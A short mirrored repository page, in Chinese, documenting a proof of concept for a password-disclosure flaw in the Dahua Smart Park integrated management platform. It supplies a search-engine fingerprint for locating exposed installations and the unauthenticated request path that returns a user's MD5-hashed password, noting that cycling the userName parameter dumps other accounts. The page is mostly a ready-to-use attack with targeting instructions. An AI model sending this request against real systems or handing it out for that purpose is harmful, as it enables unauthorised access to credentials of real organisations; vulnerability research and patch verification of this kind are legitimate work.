admin/POC
1
0
Fork 0
mirror of https://github.com/eeeeeeeeee-code/POC.git synced 2025-11-08 11:57:27 +00:00
Code Issues Packages Projects Releases Wiki Activity
POC/wpoc/大华/大华智慧园区综合管理平台/大华智慧园区综合管理平台密码泄露漏洞.md
eeeeeeeeee-code 06c8413e64 first commit
2025-03-04 23:12:57 +08:00

1.3 KiB
Raw Blame History

大华智慧园区综合管理平台密码泄露漏洞

一、漏洞简介

大华智慧园区综合管理平台是一个集智能化、信息化、网络化、安全化为一体的智慧园区管理平台旨在为园区提供一站式解决方案包括安防、能源管理、环境监测、人员管理、停车管理等多个方面。由于敏感目录并未进行鉴权所以可以直接得到system的密码采用MD5加密

二、影响版本

  • 大华智慧园区综合管理平台

三、资产测绘

  • hunter:app.name="Dahua 大华 智慧园区管理平台"
    1691828229241-1a7a5e8c-d5e6-4852-b428-047c6c955113.png
  • 登录页面:

1691828319702-85171e4b-cb4b-4826-a654-3c8859b17138.png

四、漏洞复现

/admin/user_getUserInfoByUserName.action?userName=system

1691939932039-c2486925-3f44-4e78-a2c5-49b640dad81d.png

可通过遍历userName参数获取md5加密的密码

更新: 2024-02-29 23:57:18
原文: https://www.yuque.com/xiaokp7/ocvun2/qkdoiry1tgrhdk63